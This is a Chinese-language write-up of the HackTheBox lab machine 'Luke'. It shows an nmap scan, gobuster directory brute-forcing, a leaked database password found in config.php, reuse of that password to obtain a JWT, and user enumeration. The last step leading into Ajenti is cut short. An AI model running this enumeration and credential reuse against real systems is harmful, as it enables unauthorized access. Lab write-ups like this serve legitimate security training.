简介
靶机凭借信息收集就可以完成,唯一的一个点是node增加jwt token,通过google查到medium上一篇文章,根据上面介绍的方法成功获得靶机的flag。
靶机状态: rooted.
文章目录
- nmap
- gobuster
- jwt
nmap
拿到ip之后,通过nmap扫描端口, 发现存在3个WEB端口1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35$ nmap -sC -sV -oA Luke 10.10.10.137
# Nmap 7.70 scan initiated Sun Jun 23 17:36:14 2019 as: nmap -sC -sV -oA Luke 10.10.10.137
Nmap scan report for 10.10.10.137
Host is up (0.63s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.15.44
| Logged in as ftp
| TYPE: ASCII
| No session upload bandwidth limit
| No session download bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp open ssh?
80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open tcpwrapped
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 23 17:40:37 2019 -- 1 IP address (1 host up) scanned in 262.37 seconds
gobuster
拿到3个WEB服务后,开始枚举服务,浏览器访问之后,确认80端口为php WEB站点,3000端口为node js站点,8000端口为Ajenti站点;利用gobuster分别对3000端口和80端口进行uri爆破,同时在google上搜索公开的Ajenti漏洞1
2
3$ gobuster dir -u http://10.10.10.137:3000 -w wordlists/SecLists/Discovery/Web-Content/common.txt -t 1
$ gobuster dir -u http://10.10.10.137 -w wordlists/dirbuster/directory-list-2.3-medium.txt -t 1
然后在80端口找到config.php文件, 拿到数据库连接串1
$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);
jwt
利用dbPassword登陆3000端口,获取jwt token1
2
3
4post 10.10.10.137:3000/login
{"username":"admin", "password":"Zk6heYCyv6ZE9Xcg"}
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY0NDEwMjA5LCJleHAiOjE1NjQ0OTY2MDl9.QvWg8Xa1QsNcUlv19G37JWCD7omdRmlSN8GnVj-YAHs"}
token为jwt token,因此查找如何在node中添加jwt token, 然后在add jwt to nodejs这篇文章中找到利用jwt token访问的方法。然后在3000端口的/users接口中找到如下用户:1
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
通过访问/users/
登陆Ajenti之后,通过notepad工具读取user.txt和root.txt